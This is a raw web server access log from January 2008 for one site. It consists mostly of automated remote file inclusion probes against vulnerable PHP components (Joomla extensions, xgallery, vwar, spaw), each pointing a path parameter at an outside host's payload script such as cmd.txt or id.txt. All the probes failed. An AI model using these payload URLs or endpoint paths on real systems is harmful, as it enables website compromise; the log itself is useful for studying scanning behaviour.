82.102.11.34 - - [31/Jan/2008:13:06:58 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:06:58 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:06:59 -0800] "GET /logs/access_071230.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:07:24 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:07:43 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:07:58 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:07:59 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.11.34 - - [31/Jan/2008:13:08:03 -0800] "GET /logs/access_071230.log//?mosConfig_absolute_path=http://www.airmatrix.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:13:08:17 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.bakhshian.ir/language/lang/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:08:31 -0800] "GET /index.php?x=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:08:31 -0800] "GET /logs/index.php?x=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:08:31 -0800] "GET /index.php?x=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:08:31 -0800] "GET /logs/index.php?x=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:13:10:09 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:13:10:09 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
75.125.10.2 - - [31/Jan/2008:13:10:18 -0800] "GET /logs/access_080106.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://hornydate.co.uk/asc???????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [31/Jan/2008:13:12:42 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [31/Jan/2008:13:12:42 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [31/Jan/2008:13:12:43 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.41.127 - - [31/Jan/2008:13:12:43 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:13:13:24 -0800] "GET /logs/access_071128.log HTTP/1.0" 200 3125481 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.225.199.128 - - [31/Jan/2008:13:14:11 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [31/Jan/2008:13:14:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [31/Jan/2008:13:14:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.149.90.29 - - [31/Jan/2008:13:14:22 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://ultrasofts.com/cmd.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
83.149.90.29 - - [31/Jan/2008:13:14:23 -0800] "GET //skin/zero_vote/error.php?dir=http://ultrasofts.com/cmd.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
67.195.44.108 - - [31/Jan/2008:13:20:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.102 - - [31/Jan/2008:13:20:01 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:13:20:18 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:13:20:18 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.163.220 - - [31/Jan/2008:13:20:18 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/paddy.only/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:13:21:36 -0800] "GET /logs/index.php?pag=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:13:21:36 -0800] "GET /index.php?pag=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:13:21:37 -0800] "GET /logs/index.php?pag=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.160.246.215 - - [31/Jan/2008:13:21:37 -0800] "GET /index.php?pag=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.28.152 - - [31/Jan/2008:13:22:04 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:23:04 -0800] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:23:09 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.225.199.128 - - [31/Jan/2008:13:23:25 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [31/Jan/2008:13:23:25 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [31/Jan/2008:13:23:25 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [31/Jan/2008:13:25:04 -0800] "GET /logs/access_071228.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [31/Jan/2008:13:25:04 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.33.2.131 - - [31/Jan/2008:13:25:33 -0800] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.californiasecession.org/discuss/images/themes/obb108/.jst/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:25:40 -0800] "GET /logs/access_071225.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://geocities.com/ini_prast/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:28:18 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:28:19 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:28:19 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:28:19 -0800] "GET /logs/access_080117.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:13:30:19 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:13:30:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:13:30:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.140 - - [31/Jan/2008:13:31:05 -0800] "GET /logs/access_080103.log/modules/Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [31/Jan/2008:13:31:05 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [31/Jan/2008:13:31:05 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.140 - - [31/Jan/2008:13:32:55 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.154.16.236 - - [31/Jan/2008:13:33:27 -0800] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://landleben.bieswang.de/contra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:13:33:32 -0800] "GET /logs/access_080117.log/xfsection/modify.php?dir_module=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:13:33:32 -0800] "GET /xfsection/modify.php?dir_module=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:13:33:33 -0800] "GET /logs/xfsection/modify.php?dir_module=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.24.21 - - [31/Jan/2008:13:34:16 -0800] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:13:34:59 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.70.47.90 - - [31/Jan/2008:13:35:17 -0800] "GET /content.php?page=http://www.uhrmacher-balster.de/components/com_joomlalib/cache/100/error_log? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
66.70.47.90 - - [31/Jan/2008:13:35:17 -0800] "GET /logs/content.php?page=http://www.uhrmacher-balster.de/components/com_joomlalib/cache/100/error_log? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:13:36:28 -0800] "GET /logs//index.php?pd=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:13:36:30 -0800] "GET //index.php?pd=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:13:39:27 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.170 - - [31/Jan/2008:13:39:59 -0800] "GET /logs/access_080103.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:13:40:06 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:13:40:06 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:13:40:06 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.197.170 - - [31/Jan/2008:13:41:47 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.92.23.94 - - [31/Jan/2008:13:42:25 -0800] "GET /logs/access_080103.log/xfsection/modify.php?dir_module=http://64.40.146.64/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:13:43:17 -0800] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:13:43:18 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:13:43:19 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.252.148.190 - - [31/Jan/2008:13:43:33 -0800] "GET /logs/access_080117.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.143 - - [31/Jan/2008:13:46:55 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.143 - - [31/Jan/2008:13:46:55 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://jascar.es/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.210.96.108 - - [31/Jan/2008:13:48:31 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
67.210.96.108 - - [31/Jan/2008:13:48:32 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
216.218.159.157 - - [31/Jan/2008:13:49:04 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.218.159.157 - - [31/Jan/2008:13:49:04 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
194.58.105.34 - - [31/Jan/2008:13:49:37 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.88.114.169 - - [31/Jan/2008:13:49:38 -0800] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.fileden.com/files/2008/1/21/1711593/temp/echox? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.58.105.34 - - [31/Jan/2008:13:49:38 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.223.98.160 - - [31/Jan/2008:13:50:47 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.imigrant.ro/cache/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:13:52:21 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:13:52:21 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.29.37 - - [31/Jan/2008:13:53:25 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:54:27 -0800] "GET /logs/access_071230.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:54:28 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:54:29 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.28.112.247 - - [31/Jan/2008:13:55:28 -0800] "GET //oneadmin/config.php?path[docroot]=http://kelate.t35.com/scripts/djd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.60.121.56 - - [31/Jan/2008:13:56:58 -0800] "GET /logs/access_071225.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.infosobre.com/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.61 - - [31/Jan/2008:13:57:30 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:57:55 -0800] "GET /logs/access_071225.log/index1.php?=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:57:55 -0800] "GET /index1.php?=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:13:57:55 -0800] "GET /logs/index1.php?=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.53 - - [31/Jan/2008:13:57:59 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.234.23.53 - - [31/Jan/2008:13:57:59 -0800] "GET //include/main.php?config[search_disp]=true&include_dir=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:58:09 -0800] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.aulaenred.net/interact/includes/w.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:58:10 -0800] "GET //components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.147.60 - - [31/Jan/2008:13:58:13 -0800] "GET /logs//components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hrpi3.100webspace.net/phpBB2/language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.30.179.207 - - [31/Jan/2008:13:59:21 -0800] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.231.35.184 - - [31/Jan/2008:14:00:50 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; IEMB3)" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:14:02:57 -0800] "GET /index.php?redir=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.20.100 - - [31/Jan/2008:14:03:21 -0800] "GET /logs/access_070729.log HTTP/1.0" 200 26979 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:14:03:47 -0800] "GET /logs/access_071230.log/index1.php?=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:14:04:50 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:14:05:01 -0800] "GET //ImageManager/Classes/ImageManager.phphttp://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.22.162.60 - - [31/Jan/2008:14:05:02 -0800] "GET /logs//ImageManager/Classes/ImageManager.phphttp://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
